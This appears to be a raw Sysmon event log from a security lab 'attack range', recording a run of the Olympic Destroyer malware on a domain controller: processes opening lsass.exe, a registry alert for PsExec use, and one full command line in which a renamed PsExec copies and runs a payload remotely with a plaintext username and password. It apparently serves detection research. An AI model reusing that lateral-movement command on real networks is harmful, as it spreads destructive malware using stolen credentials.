10:56:41.942{C8EA50B7-F11C-6215-0A00-000000003802}620820C:\Windows\system32\services.exe{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\system32\vssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.927{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12E9-6216-5405-000000003802}7116C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000217635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:43.714{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F25B74A0C30A53538A7F3CD79D60CF,SHA256=50E4B7109CABCAF7310308CEA3CE84B9E14F23882C3073925693024A2D808115,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.928{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.928{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.928{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.928{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.928{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.928{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.929{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.928{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.863{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7E6A44288A5A4A0408D36F85523BDA01,SHA256=E762A1FDB9A2C16BEA4A9B68FE7FD3BCCFEFAE6EEBE4D1D80A63B1042E91A83E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.667{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59036- 354300x8000000000000000291027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.268{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53694- 354300x8000000000000000291026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.262{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54661- 354300x8000000000000000291025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.237{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56667- 354300x8000000000000000291024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.237{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52720- 354300x8000000000000000291023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.237{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51858- 354300x8000000000000000291022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.237{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56069- 354300x8000000000000000291021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.237{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52175- 354300x8000000000000000291020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.237{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53694- 23542300x8000000000000000291019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.728{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6004C1F2AB900B56DE12DF0F8239467,SHA256=8D23BBC6D667750CFF85E7A616BD07F75EE6F51833A2269B520C3E805DBCA7F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.665{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.665{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.665{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.665{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:43.665{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 13241300x8000000000000000291013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:43.665{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 22542200x8000000000000000291012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.540{C8EA50B7-F11F-6215-1300-000000003802}616ip-10-0-1-12.eu-central-1.compute.internal0::ffff:10.0.1.12;C:\Windows\System32\svchost.exe 22542200x8000000000000000291011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.109{C8EA50B7-F11F-6215-1300-000000003802}616igmp.mcast.net0::ffff:224.0.0.22;C:\Windows\System32\svchost.exe 22542200x8000000000000000291010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.084{C8EA50B7-12E6-6216-4B05-000000003802}6792224.0.0.2520224.0.0.252;C:\Temp\olympic_destroyer.exe 22542200x8000000000000000291009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.084{C8EA50B7-12E6-6216-4B05-000000003802}6792239.255.255.2500239.255.255.250;C:\Temp\olympic_destroyer.exe 22542200x8000000000000000291008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.680{C8EA50B7-F11F-6215-1300-000000003802}616ip-10-0-1-255.eu-central-1.compute.internal010.0.1.255;C:\Windows\System32\svchost.exe 22542200x8000000000000000291007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.672{C8EA50B7-F11F-6215-1300-000000003802}616ip-10-0-1-255.eu-central-1.compute.internal0::ffff:10.0.1.255;C:\Windows\System32\svchost.exe 10341000x8000000000000000291006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.628{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EB-6216-6E05-000000003802}6480C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.628{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EB-6216-6E05-000000003802}6480C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.628{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EB-6216-6D05-000000003802}6488C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.628{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EB-6216-6D05-000000003802}6488C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.597{C8EA50B7-12EB-6216-6E05-000000003802}64806472C:\Windows\system32\conhost.exe{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.597{C8EA50B7-12EB-6216-6D05-000000003802}64882236C:\Windows\system32\conhost.exe{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.565{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EB-6216-6D05-000000003802}6488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.565{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EB-6216-6E05-000000003802}6480C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 